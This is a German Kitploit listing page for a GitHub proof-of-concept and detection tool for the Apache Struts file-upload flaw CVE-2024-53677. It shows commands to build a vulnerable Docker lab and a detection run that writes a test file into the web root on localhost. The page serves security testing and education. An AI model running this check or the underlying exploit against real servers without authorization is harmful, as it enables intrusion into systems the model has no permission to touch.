Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
struts_cve-2024-53677 — Proof-of-Concept-Exploit- und Erkennungsskript für Apache Struts CVE-2024-53677 (S2-067), einschließlich einer Docker-basierten verwundbaren Laborumgebung zum Testen. | Kitploit
Tools/GitHubGitHub/0xpthree/struts_cve-2024-53677
SchwachstellenscannerExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHub0xpthree/struts_cve-2024-53677

struts_cve-2024-53677

Proof-of-Concept-Exploit- und Erkennungsskript für Apache Struts CVE-2024-53677 (S2-067), einschließlich einer Docker-basierten verwundbaren Laborumgebung zum Testen.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Proof-of-Concept

Testumgebung einrichten

root@kitploit:~
» git clone [email protected]:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1
root@kitploit:~
» curl http://127.0.0.1:8081/upload.action

<html>
  <head>
    <title>Datei-Upload</title>
  </head>
  <body>
    <h1>Apache Struts 6.3.0.1</h1>
    <p>Willkommen im Apache Struts 6.3.0.1 Labor. Diese Anwendung ist anfällig für CVE-2023-50164 und CVE-2024-53677.</p>
    <form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
      <table class="wwFormTable">
        <tr>
          <td class="tdLabel"></td>
          <td 
            class="tdInput"            
            ><input type="file" name="upload" id="upload_upload"/></td>
        </tr>
        <tr>
          <td colspan="2">
            <div class="formButton"><input type="submit" value="Absenden" id="upload_0"/></div>
          </td>
        </tr>
      </table>
    </form>
  </body>
</html>

Exploit

root@kitploit:~
» curl http://127.0.0.1:8081/vuln_test.txt                                  
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Typ</b> Statusbericht</p><p><b>Meldung</b> Die angeforderte Ressource [&#47;vuln_test.txt] ist nicht verfügbar</p><p><b>Beschreibung</b> Der Ursprungsserver hat keine aktuelle Darstellung für die Zielressource gefunden oder ist nicht bereit, deren Existenz offenzulegen.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>

» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Erkennungsprozess wird gestartet...
2025-01-07 12:21:20,822 [INFO] Erkennung für CVE-2024-53677 (S2-067) wird gestartet...
2025-01-07 12:21:20,823 [INFO] Testanfrage wird an den Upload-Endpunkt gesendet: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] Datei-Upload-Anfrage erfolgreich.
2025-01-07 12:21:20,838 [WARNUNG] [ALARM] Überschreiben des Dateinamens erkannt. Ziel könnte anfällig sein!
2025-01-07 12:21:20,838 [INFO] Erkennungsprozess abgeschlossen.

» curl http://127.0.0.1:8081/vuln_test.txt                                  
CVE-2024-53677 / S2-067 Erkennungstest.

» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan  7 11:23 .
drwxr-xr-x 1 root root 4096 Jan  7 11:18 ..
drwxr-x--- 2 root root 4096 Jan  7 11:14 forbidden
-rw-r----- 1 root root  226 Jan  7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan  7 11:14 META-INF
-rw-r----- 1 root root   39 Jan  7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan  7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt 
CVE-2024-53677 / S2-067 Erkennungstest.

Prüfskript von: https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK

Tool herunterladen